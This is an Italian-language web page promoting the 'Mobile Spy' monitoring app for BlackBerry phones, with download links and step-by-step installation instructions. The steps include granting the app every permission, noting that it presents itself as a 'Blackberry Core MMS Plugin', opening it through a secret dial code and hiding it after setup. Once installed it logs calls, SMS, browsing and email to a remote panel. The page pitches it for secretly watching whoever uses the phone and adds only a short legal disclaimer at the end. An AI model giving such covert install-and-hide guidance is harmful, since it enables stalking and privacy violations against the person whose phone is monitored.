Sei Qui
Home > Connessione Internet > Modem e Chiavette Internet > Spia Cellulare BlackBerry – Spiare BlackBerry

Spia Cellulare BlackBerry – Spiare BlackBerry

Mobile Spy è la nuova generazione di software spia per telefoni cellulari e smartphone. Se hai il sospetto che qualcuno usi il tuo blackberry in modo non trasparente allora questo software è l’ideale. Basta installare questo piccolo programma sul tuo cellulare blackberry per avviare la registrazione di tutte le chiamate fatte, sms inviati, pagine navigate, messaggi ed email ricevute ecc…

Per tutte le istruzioni (in italiano) per installare e utilizzare il programma, vai su: http://www.cellulare-spia.com

Di seguito i 3 semplici passi da seguire per iniziare a registrare tutte le attività che avvengono sul cellulare dove si installa il programma Mobile Spy:

1) REGISTRATI SUL SITO per creare un tuo account con username e password.

2) Dopo aver creato la tua username e password procedi con questi punti:

a. Verifica la versione del tuo Blackberry.

Per far ciò premi il bottone del Menu poi vai suImpostazioni –> Informazioni su e si apre una pagina in cui c’è la versione del tuo blackberry.

Ecco di seguito i link per scaricare Mobile Spy 5.0 sul tuo Blackberry. Considera il link relativo alla versione del tuo balckberry.

Mobile Spy Version 5.0 (LIVE Control Panel, Email Log Delivery & SMS Commands)

OS Versione 4.0 – 5.0: http://www.mobilespylogs.com/dls/ms5-b-nt/ms5.jad

OS 5.0 Touchscreens: http://www.mobilespylogs.com/dls/ms5-b-touch/ms5.jad

OS Versione 6.0: http://www.mobilespylogs.com/dls/ms5-b6/ms5.jad

OS Versione 7.0: http://www.mobilespylogs.com/dls/ms5-b7/ms5.jad

a1. Apri la pagina web dal tuo BlackBerry e inserisci esattamente uno degli indirizzi sopra scritti, in base alla versione del tuo blackberry

b. Comparirà la seguente schermata in cui dovrai selezionare il box difianco alla voce “Imposta autorizzazioni per l’applicazione” e poi cliccare sul bottone SCARICA.

c). Appena premuto il bottone SCARICA uscirà una finestra con scritto “Blackberry Core MMS Plugin richiede modifiche alle autorizzazioni di controllo delle applicazioni“. Clicca su VISUALIZZA e vedrai la pagina dei “permessi”, impostali tutti su “Allow” (in italiano “CONSENTI”) e infine clicca sul tasto per ritornare INDIETRO e poi seleziona SALVA:


d. A questo punto inizierà l’installazione del programma sul blackberry. Alla fine spegni e riaccendi il tuo blackberry.

e. Per far apparire la schermata del programma basta fare una chiamata al #10001*. Se chiamando questo numero non appare nulla allora utilizza uno dei due modi seguenti

1. Chiama #10001* e mentre la voce dell’operatore ti dice che il numero è inesistente premi il tasto INDIETRO e poi il tasto rosso per chiudere la chiamata.

2. Chiama #10001* poi premi il tasto del Menu del BlackBerry e poi seleziona “Passa da un applicazione ad un’altra” e vedrai apparire l’icona del programma “Smartphone_V2” insieme alle altre (Home Screen, Phone, etc.). Seleziona tale icona Smartphone e si aprirà una schermata con i box “username” e “password”.

f. Quando appare l’interfaccia del programma per la prima volta, devi inserire la tua username e password (quelle impostate al punto 1) . Questi devono essere identici a quelli creati in fase di registrazione.

Una volta fatto il login imposta quello che vuoi tracciare. Di default è selezionato tutto, infatti vedrai una schermata come questa:

Per chiudere e nascondere il programma clicca il bottone del Blackberry Menu e poi seleziona “Exit”.

NB: Se invece di “Exit” si seleziona “Uninstall” si disisntalla il programma dal blackberry in modo definitivo.

Da questo momento in poi tutte le chiamate, sms inviati/ricevuti e altre attività li potrai vedere dal tuo pannello di controllo.

Per registrare un account e per maggiori informazioni vai su: http://www.cellulare-spia.com

Nota: Mobile Spy è progettato per essere utilizzato SOLO sul tuo smartphone per monitorare tuoi bambini o eventuali tuoi dipendenti e di cui disponi espressa autorizzazione al monitoraggio. E’ bene sapere questa cosa per non incorrere in problemi legali per violazione privacy!

Lascia un commento

Top